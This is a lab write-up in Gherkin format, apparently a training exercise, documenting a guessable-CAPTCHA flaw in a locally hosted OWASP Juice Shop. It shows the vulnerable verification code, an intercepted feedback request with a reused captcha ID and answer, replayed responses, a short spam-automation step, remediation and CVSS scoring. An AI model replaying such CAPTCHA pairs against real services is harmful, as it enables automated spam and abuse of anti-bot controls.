## Version 1.4.2
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Broken Access Control
  Location:
    /api/Feedbacks/ - captchaId (Parameter)
  CWE:
    CWE-804: Guessable CAPTCHA
  Rule:
    REQ.174: https://fluidattacks.com/web/es/rules/174/
  Goal:
    Send a lot of feedbacks in a short time
  Recommendation:
    Use one-time-only captchas

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running Juice-Shop in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  Static captchas
    Given I see the code at "captcha.js"
    """
    ...
    30  captchas.verifyCaptcha = () => (req, res, next) => {
    31    models.Captcha.findOne({ where: { captchaId: req.body.captchaId } }).
    then(captcha => {
    32      if (req.body.captcha === captcha.dataValues.answer) {
    33        next()
    34      } else {
    35        res.status(401).send('Wrong answer to CAPTCHA. Please try again.')
    36      }
    37    })
    38  }
    ...
    """
    Then I see it takes a predefined value for a captcha ID for validation

  Scenario: Dynamic detection
  Repeating request
    Given I go to "http://localhost:8000/#/contact"
    And intercept a feedback request with Burp
    """
    POST /api/Feedbacks/ HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: application/json, text/plain, */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/
    Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzd
    WNjZXNzIiwiZGF0YSI6eyJpZCI6MTQsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwic
    GFzc3dvcmQiOiIzNzQwY2YzYjU0NWVmZTcyMTc3MzgzOTAxMmNlYzI2MCIsImlzQWRtaW4iOmZhb
    HNlLCJsYXN0TG9naW5JcCI6IjAuMC4wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsI
    mNyZWF0ZWRBdCI6IjIwMTktMDEtMzEgMTM6NDI6MzUuNjM5ICswMDowMCIsInVwZGF0ZWRBdCI6I
    jIwMTktMDEtMzEgMTM6NDI6MzUuNjM5ICswMDowMCJ9LCJpYXQiOjE1NDg5NDIxNjIsImV4cCI6M
    TU0ODk2MDE2Mn0.xnRI_ABuRRLUlGy1ij9Y4NPaPtXhsEP9JSBfb5dn1Hc7-pyPdbDDaw_cKb-dF
    OIkl7G0mn41iXOmTBBbs3if_VN2-6dzqSwvVKwKzbTCFWQ4q19y78_FjrsFW9_oWMLc-Owvn-fBE
    QKfdOp4s0toYLG--10ALBRjxEVzcYJ4CsQ
    Content-Type: application/json
    Content-Length: 69
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=qLJQb75kaErlpYvw4AP9HLhy
    sxi6SWubc8uBhJgT5KdKgx2mOoXDZWMR1ye8; io=pge0V-Vs8BLFh8qRAAAR; token=eyJhbGc
    iOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MT
    QsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwicGFzc3dvcmQiOiIzNzQwY2YzYjU0NW
    VmZTcyMTc3MzgzOTAxMmNlYzI2MCIsImlzQWRtaW4iOmZhbHNlLCJsYXN0TG9naW5JcCI6IjAuMC
    4wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsImNyZWF0ZWRBdCI6IjIwMTktMDEtMz
    EgMTM6NDI6MzUuNjM5ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMTktMDEtMzEgMTM6NDI6MzUuNj
    M5ICswMDowMCJ9LCJpYXQiOjE1NDg5NDIxNjIsImV4cCI6MTU0ODk2MDE2Mn0.xnRI_ABuRRLUlG
    y1ij9Y4NPaPtXhsEP9JSBfb5dn1Hc7-pyPdbDDaw_cKb-dFOIkl7G0mn41iXOmTBBbs3if_VN2-6
    dzqSwvVKwKzbTCFWQ4q19y78_FjrsFW9_oWMLc-Owvn-fBEQKfdOp4s0toYLG--10ALBRjxEVzcY
    J4CsQ

    {"UserId":14,"captchaId":1,"captcha":"6","comment":"ffff","rating":5}
    """
    Then I notice the captchaId parameter and find it interesting
    Then I send the request to Burp Repeater
    Then I forward it and get a success response
    """
    HTTP/1.1 201 Created
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Location: /api/Feedbacks/8
    Content-Type: application/json; charset=utf-8
    Content-Length: 154
    ETag: W/"9a-aqz2HAqAy4Kng1Hf9/A8qZH7GHA"
    Date: Thu, 31 Jan 2019 16:37:52 GMT
    Connection: close

    {"status":"success","data":{"id":8,"UserId":14,"comment":"ffff","rating":5,"
    updatedAt":"2019-01-31T16:37:52.907Z","createdAt":"2019-01-31T16:37:52.907Z"
    }}
    """
    Then I send it again and once again get a successful response
    """
    ...
    {"status":"success","data":{"id":10,"UserId":14,"comment":"ffff","rating":5,
    "updatedAt":"2019-01-31T16:40:42.395Z","createdAt":"2019-01-31T16:40:42.395Z
    "}}
    """
    Then I change the captchaId and get an error this time
    """
    HTTP/1.1 401 Unauthorized
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: text/html; charset=utf-8
    Content-Length: 42
    ETag: W/"2a-0bhawgvZt+oT5sCkemBQdamCIP0"
    Date: Thu, 31 Jan 2019 16:41:16 GMT
    Connection: close

    Wrong answer to CAPTCHA. Please try again.
    """
    Then I know captcha answers are tied to id numbers

  Scenario: Exploitation
  Spamming feedbacks
    Given I know I bypass the captcha by knowing only one id and it's answer
    Then I can automatically send feedback requests with that captcha data pair
    And send however many feedbacks I want in a short time

  Scenario: Remediation
  Access control
    Given I implement google ReCaptcha or any other proper captcha system
    Then the captcha is much more difficult to bypass

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.3/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.9/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    4.9/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-31
